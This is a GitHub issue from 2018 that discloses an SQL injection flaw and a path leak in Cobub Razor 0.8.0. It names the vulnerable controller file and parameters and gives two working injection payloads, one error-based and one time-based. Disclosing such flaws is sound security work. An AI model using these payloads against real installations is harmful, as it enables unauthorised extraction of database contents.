Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Some vulnerabilities in Cobub Razor 0.8.0 #162

Open
Kyhvedn opened this issue Mar 10, 2018 · 0 comments
Open

Some vulnerabilities in Cobub Razor 0.8.0 #162

Kyhvedn opened this issue Mar 10, 2018 · 0 comments

Comments

@Kyhvedn
Copy link

Kyhvedn commented Mar 10, 2018

1)SQL injection
Code source: /application/controllers/manage/channel.php at line 75-95
The string of the 'channel_name' and 'platform' parameter transmission is completely without check and filter,so if the string is passed, it will lead to the existence of SQL injection vulnerability,This could result in full information disclosure.
The SQL injection type: error-based and AND/OR time-based blind
Parameter: channel_name,platform
Payload(This string is also applied to 'platform' at the same time):

1.channel_name=test" AND (SELECT 1700 FROM(SELECT COUNT(*),CONCAT(0x7171706b71,(SELECT (ELT(1700=1700,1))),0x71786a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- JQon&platform=1
2.channel_name=test" AND SLEEP(5)-- NklJ&platform=1

2)physical path Leakage
The pages leaked the absolute path:
URL: http://localhost/export.php
http://localhost/index.php?/manage/channel/addchannel(POST method:channel_name=test"&platform=1)

@Kyhvedn Kyhvedn changed the title Some vulnerability in Cobub Razor 0.8.0 Some vulnerabilities in Cobub Razor 0.8.0 Mar 11, 2018
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant